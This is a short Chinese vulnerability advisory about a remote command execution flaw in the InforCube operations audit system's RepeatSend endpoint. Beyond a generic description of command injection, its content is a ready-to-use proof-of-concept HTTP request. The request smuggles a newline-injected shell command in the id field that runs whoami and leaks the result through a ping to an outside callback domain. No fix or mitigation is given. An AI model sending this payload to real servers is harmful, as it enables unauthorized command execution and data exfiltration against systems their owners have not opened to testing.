InforCube运维管理审计系统 repeatsend 远程命令执行漏洞

日期: 2024-07-09 19:43:14 | 影响软件: InforCube运维管理审计系统 | POC: 已公开

漏洞描述

远程命令执行漏洞是指攻击者通过构造特定的请求,使得服务器端执行非预期的命令,从而可能导致未授权的数据访问、权限提升、服务中断等严重后果。这种漏洞通常由于应用程序对用户输入的验证不充分或者对外部命令调用缺乏必要的安全控制而产生。

PoC代码

POST /emailapply/RepeatSend HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: application/x-www-form-urlencoded
 
id='%0aping `whoami`.rksghqxnbe.dgrh3.cn%0a'

相关漏洞推荐